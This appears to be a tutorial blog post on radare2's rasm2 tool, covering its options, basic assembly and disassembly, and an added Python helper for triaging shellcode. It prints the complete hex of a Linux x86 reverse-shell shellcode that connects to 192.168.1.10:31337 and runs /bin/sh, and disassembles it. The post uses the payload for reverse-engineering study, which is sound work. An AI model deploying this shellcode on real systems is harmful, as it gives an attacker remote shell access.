radare and the newer radare2 are an open source reverse engineering framework, which can be found here:
http://radare.org/y/
It has quite a few tools, and the webpage has excellent documentation. In this post I want to review the "rasm2" assembler / disassembler utility, which is one of the main tools in the package. It can work on hex streams, files, opcodes, etc.; there are quite a few options, as we can see from the help:
root@kali:~# rasm2 -h
rasm2 [-e] [-o offset] [-a arch] [-s syntax] -d "opcode"|"hexpairs"|- [-f file ..]
-d Disassemble from hexpair bytes
-D Disassemble showing hexpair and opcode
-f Read data from file
-F [in:out] Specify input and/or output filters (att2intel, x86.pseudo, ...)
-o [offset] Set start address for code (0x08048000)
-a [arch] Set architecture plugin
-b [bits] Set architecture bits
-s [syntax] Select syntax (intel, att)
-B Binary input/output (-l is mandatory for binary input)
-l [int] Input/Output length
-C Output in C format
-L List supported asm plugins
-e Use big endian
-v Show version information
If '-l' value is greater than output length, output is padded with nops
If the last argument is '-' reads from stdin
Here are just a few random disassemble examples:
root@kali:~# rasm2 -d 90
nop
root@kali:~# rasm2 -d 53
push ebx
root@kali:~# rasm2 -d 44
inc esp
We can also go the other way and assemble:
root@kali:~# rasm2 "nop"
90
root@kali:~# rasm2 "nop;inc esp;push ebx"
904453
It supports quite a few formats:
root@kali:~# rasm2 -L
ad arm ARM disassembly plugin
ad armthumb ARM THUMB disassembly plugin
_d avr AVR Atmel disassembler
ad bf Brainfuck disassembly plugin
_d csr CSR disassembly plugin
ad dalvik Dalvik (Android VM) disassembly plugin
ad java Java CLASS assembler/disassembler
_d mips MIPS disassembly plugin
_d msil MSIL disassembly plugin
_d ppc PPC disassembly plugin
_d sh SH-4 disassembly plugin
_d sparc SPARC disassembly plugin
_d x86 udis86 disassembly plugin
a_ x86.nz x86 assembler with non-zeros
ad x86.olly X86 disassembly plugin (olly engine)
It's very useful for shellcode analysis. I took the following as an example:
Although the assembly is on the site, rasm2 can also show it nicely:
root@kali:~# rasm2 -d 31c031db31c931d2b066b301516a066a016a0289e1cd8089c6b06631dbb30268c0a8010a66687a696653fec389e16a10515689e1cd8031c9b103fec9b03fcd8075f831c052686e2f7368682f2f626989e3525389e15289e2b00bcd80
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov al, 0x66
mov bl, 0x1
push ecx
push 0x6
push 0x1
push 0x2
mov ecx, esp
int 0x80
mov esi, eax
mov al, 0x66
xor ebx, ebx
mov bl, 0x2
push dword 0xa01a8c0
push word 0x697a
push bx
inc bl
mov ecx, esp
push 0x10
push ecx
push esi
mov ecx, esp
int 0x80
xor ecx, ecx
mov cl, 0x3
dec cl
mov al, 0x3f
int 0x80
jnz 0x804803a
xor eax, eax
push edx
push dword 0x68732f6e
push dword 0x69622f2f
mov ebx, esp
push edx
push ebx
mov ecx, esp
push edx
mov edx, esp
mov al, 0xb
int 0x80
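As an added example (not from the original post or the radare project), here is a small Python helper that triages an rasm2 listing like the one above from the analyst's side: it names each int 0x80 from the preceding mov al, and decodes the pushed immediates back into the IPv4 address, port and string the shellcode assembles on the stack. The embedded listing is a trimmed copy of the output above (only mov al, push and int 0x80 lines, in order), and the syscall table is the standard i386 numbering.

```python
import re
import socket
import struct

# Constructed input: the `rasm2 -d` listing of the shellcode above, trimmed to the
# lines the decoder looks at (mov al, push, int 0x80); order is preserved.
LISTING = (
    "mov al, 0x66\npush ecx\npush 0x6\npush 0x1\npush 0x2\nint 0x80\n"
    "mov al, 0x66\npush dword 0xa01a8c0\npush word 0x697a\npush bx\n"
    "push 0x10\npush ecx\npush esi\nint 0x80\n"
    "mov al, 0x3f\nint 0x80\n"
    "push edx\npush dword 0x68732f6e\npush dword 0x69622f2f\n"
    "push edx\npush ebx\npush edx\nmov al, 0xb\nint 0x80\n"
)

# i386 syscall numbers used by the listing (socketcall=102, dup2=63, execve=11).
SYSCALLS_I386 = {0x66: "socketcall", 0x3f: "dup2", 0x0b: "execve"}

def syscalls(listing):
    """Name each `int 0x80` from the most recent `mov al, N` before it."""
    al, calls = None, []
    for line in listing.splitlines():
        m = re.fullmatch(r"mov al, 0x([0-9a-f]+)", line.strip())
        if m:
            al = int(m.group(1), 16)
        elif line.strip() == "int 0x80":
            calls.append(SYSCALLS_I386.get(al, f"sys_{al}"))
    return calls

def stack_constants(listing):
    """Recover what the pushed immediates build on the stack: a sockaddr_in
    (little-endian dword as IPv4, word as a network-order port) and any
    printable string, reassembled in memory order (the stack grows downward)."""
    ips, ports, fragments = [], [], []
    for line in listing.splitlines():
        m = re.fullmatch(r"push (?:(dword|word) )?0x([0-9a-f]+)", line.strip())
        if not m:
            continue
        size, val = m.group(1) or "dword", int(m.group(2), 16)
        if size == "word":
            ports.append(struct.unpack(">H", struct.pack("<H", val))[0])
        elif val > 0xFFFF:  # small constants (socket args, sizes) are skipped
            raw = struct.pack("<I", val)
            if all(0x20 <= b < 0x7F for b in raw):
                fragments.append(raw.decode("ascii"))
            else:
                ips.append(socket.inet_ntoa(raw))
    return {"ips": ips, "ports": ports, "strings": "".join(reversed(fragments))}

if __name__ == "__main__":
    print(syscalls(LISTING), stack_constants(LISTING))
```

Running it on the listing above names the four syscalls as socketcall, socketcall, dup2, execve and recovers 192.168.1.10, port 31337 and the string //bin/sh, which is enough to tell a connect-back shell from a bind shell without stepping through the bytes by hand.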
We can also specify an offset if we know where the given instruction will be in memory:
root@kali:~# rasm2 -o 0x8048060 "call 0x09080706"
e8a1860301
root@kali:~# rasm2 -o 0x8048060 -d e8a1860301
call dword 0x9080706